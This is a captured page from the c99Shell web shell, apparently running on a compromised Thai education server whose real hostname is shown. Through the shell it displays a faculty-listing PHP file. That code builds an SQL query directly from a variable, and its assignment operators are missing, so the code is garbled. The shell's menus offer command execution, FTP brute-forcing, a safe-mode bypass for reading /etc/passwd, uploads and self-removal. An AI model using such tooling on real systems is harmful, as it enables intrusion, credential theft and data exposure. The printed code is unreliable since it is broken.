!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/edu_depart/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Menu_Faculty.php (5.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();
 if (session_is_registered("valid_user")&&session_is_registered("Priority")  )
 {
include("../include/FunctionDB.php");
include("admin_menu.php");
include("../include/Function.php");
ConnectDB();
$strSQL "SELECT * FROM faculty_tb";
$result mysql_query($strSQL); 
$total mysql_num_rows$result );
?> 

<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<table width="811" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="811" ><br> 
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Edu_Menu.php">หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="AddFaculty.php">เพิ่มข้อมูลฝ่าย</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="EditFacultyList.php"> แก้ไขข้อมูลภาค/ฝ่าย</a></font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="">
    <p align="left"><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
    <table width="97%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" style="border:0px solid gray">
      <tr bgcolor="#DBE4E9">
        <td height="25" colspan="5"><div align="center"><font color="#000000" size="2" face="Tahoma"><strong>ราชื่อภาควิชา 
          / ฝ่าย</strong></font></div></td>
      </tr>
      <tr bgcolor="#CCCCCC">
        <td width="29" align="center"><font color="#000000" size="2" face="Tahoma">No.</font></td>
        <td width="90" align="center" bgcolor="#CCCCCC"><font color="#000000" size="2" face="Tahoma">รหัสหน่วยงาน</font></td>
        <td colspan="2" align="center"><font color="#000000" size="2" face="Tahoma">ชื่อภาควิชา</font></td>
        <td width="174" align="center"><font color="#000000" size="2" face="Tahoma">จำนวนบุคลากรในฝ่ายงาน 
          /ภาควิชา </font></td>
      </tr>
      <?php
$i 1;
 while($row mysql_fetch_array($result))
 {

     if($count==0)
     {
?>
      <tr bordercolor="#CCCCCC" bgcolor="#EEEEEE" onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#EEEEEE'" >
        <td align="center" ><strong><font color="#000000" size="2" face="Tahoma">
          <?=$i?>
        </font></strong></td>
        <td align="center" ><font color="#0033CC" size="2" face="Tahoma">
          <?=$row["Faculty_code"]?>
        </a></font></td>
        <td width="200" align="center" ><div align="left"><font color="#0033CC" size="2" face="Tahoma"><a href="PersonFacList.php?Faculty_code=<?=$row["Faculty_code"]?>" title="Click to see Detail"class="d" >
          <?=$row["Faculty_name"]?>
        </a></font></div></td>
        <td width="290" align="center" ><div align="left"><font color="#000000" size="2" face="Tahoma">
            <?=$row["Faculty_nameE"]?>
        </font></div></td>
        <td align="center" ><font color="#0033CC" size="2" face="Tahoma"><a href="PersonFacList.php?Faculty_code=<?=$row["Faculty_code"]?>"title="Click to see Detail"class="d" >
          <?php
      $Faculty_code $row[Faculty_code];
      $sql1 "Select * From personal_tb Where Faculty_code='$Faculty_code' ";
      $result1 mysql_query($sql1) or die("Error".mysql_error()); 
      $rss mysql_fetch_array($result1);
      $num mysql_num_rows($result1);
       echo "$num";
      ?>
        </a>&nbsp;&nbsp;&nbsp;<font color="#000000">คน</font></font></td>
      </tr>
      <?
    $count=1;
     }
else
{
?>
      <tr bordercolor="#CCCCCC" bgcolor="#FFFFFF" onmouseover="this.style.backgroundColor='#FCFCF3'" onmouseout="this.style.backgroundColor='#FFFFFF'">
        <td align="center" ><strong><font color="#000000" size="2" face="Tahoma">
          <?=$i?>
        </font></strong></td>
        <td align="center" ><font color="#0033CC" size="2" face="Tahoma">
          <?=$row["Faculty_code"]?>
        </a></font></td>
        <td align="center" ><div align="left"><font color="#0033CC" size="2" face="Tahoma"><a href="PersonFacList.php?Faculty_code=<?=$row["Faculty_code"]?>" title="Click to see Detail" class="d">
          <?=$row["Faculty_name"]?>
        </a></font></div></td>
        <td height="18" align="center" ><div align="left"><font color="#000000" size="2" face="Tahoma">
            <?=$row["Faculty_nameE"]?>
        </font></div></td>
        <td align="center" ><font color="#0033CC" size="2" face="Tahoma"><a href="PersonFacList.php?Faculty_code=<?=$row["Faculty_code"]?>"title="Click to see Detail"class="d" >
          <?php
      $Faculty_code $row[Faculty_code];
      $sql1 "Select * From personal_tb Where Faculty_code='$Faculty_code' ";
      $result1 mysql_query($sql1) or die("Error".mysql_error()); 
      $rss mysql_fetch_array($result1);
      $num mysql_num_rows($result1);
       echo "$num";
      ?>
        </a>&nbsp;&nbsp;&nbsp;<font color="#000000">คน</font></font></td>
      </tr>
      <?
$count=0;
}
$i++;
 }    
CloseDB();
?>
      <tr bgcolor="#DBE4E9">
        <td colspan="5" align="center"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด <? echo $total ?> รายการ&nbsp;</font> </strong></div></td>
      </tr>
    </table>
    </form>
          </fieldset>
        <br>
      <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ</font></td>
    </tr>
</table>
<?php 
    }
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--